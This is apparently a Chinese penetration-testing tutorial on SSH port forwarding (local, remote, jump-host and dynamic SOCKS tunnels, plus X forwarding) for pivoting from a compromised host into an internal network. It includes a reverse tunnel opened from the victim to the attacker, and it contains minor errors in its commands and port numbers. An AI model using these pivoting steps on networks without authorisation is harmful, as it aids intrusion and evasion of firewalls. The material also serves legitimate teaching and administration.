在很多时候拿到了内网的一台主机，我们需要用它做跳板来对内网进一步扩大战果。

也许方法很多，meterpreter，nc等等。但是最方便也最有可能穿透防火墙的方法，就是用ssh。

分为四种类型：

本地转发，远程转发，跳板转发，动态转发。

本地转发

假设攻击机A主机为本机，ip是y.y.y.y,用户是hacker，被攻击且用作跳板的主机是B，ip是

x.x.x.x，对应的内网ip是10.0.0.2，用户是root，ssh的端口是22。

假设B机器上的80端口开放了一个服务，但是只有B主机本机上才能访问，这时候可以使用本地转

发，在A机器上执行命令：

ssh -L 8080:localhost:80 root@x.x.x.x

这样，在本机A中访问localhost:80,数据被转发到B主机的80端口，即实现了访问B机器的本地

服务。

很常见的一个实例就是攻击者拿下了某目标内部的网关服务器，但是出于安全考虑网管的web控

制台界面只有在网关服务器自身上才能访问，这时候就可以通过这种方式转发流量，方便的操作

网关服务器的web控制台了。

上面的情况，是基于A主机可以ssh到B的情况，但假如从A到B的ssh连接被拒绝，而恰好B主机的

防火墙没有禁止其使用ssh外连，这时候就可以通过远程转发来实现上述同样的效果。

在B机器上执行命令：

ssh -R 8080:localhost80 hacker@y.y.y.y

这时候在A机器上访问自身的8080端口，数据也是被转发到了B主机的80端口上的。

可见，这种方式受到的局限比较多，因为如果能够在B主机上使用ssh外连了，还需要通过ssh来

转发流量的情况也是很少见的，但也不是没有。

以上两种转发，都是只对跳板服务器自身的服务，很多时候，渗透需要的是内网中一台稳定的跳板，

这时候就可以使用

跳板转发来实现多主机之间转发。

假设现在需要通过B主机作为跳板，来访问与B处于同一内网中的机器C的80端口，假设C的ip是

10.0.0.3,这时候可以在攻击机上执行如下命令：

ssh -g -L 8080:10.0.0.3:80 root@x.x.x.x

此时在A主机上8080端口的流量就被转发到C主机的80端口上了。

最有用的就是最后要介绍的，

动态转发，这种转发可以将流量随心所欲的转发，此时实现的效果就相当于代理服务器，在A机器

上用下面的命令实现：

ssh -D 8080 root@x.x.x.x

此时在A机器上配置SOCKS代理端口localhost:8080,就可以以B为代理服务器随心所欲的畅游。

最后补充使用ssh进行X转发的命令，其实很简单：

ssh -X root@x.x.x.x

这样连接上以后，目标机器的X服务器所做的操作都会通过x协议发送到本地，很方便的实现了可

视化操作。

例如在终端输入firefox，就可以在本地弹出一个实际上运行在远程的firefox进程。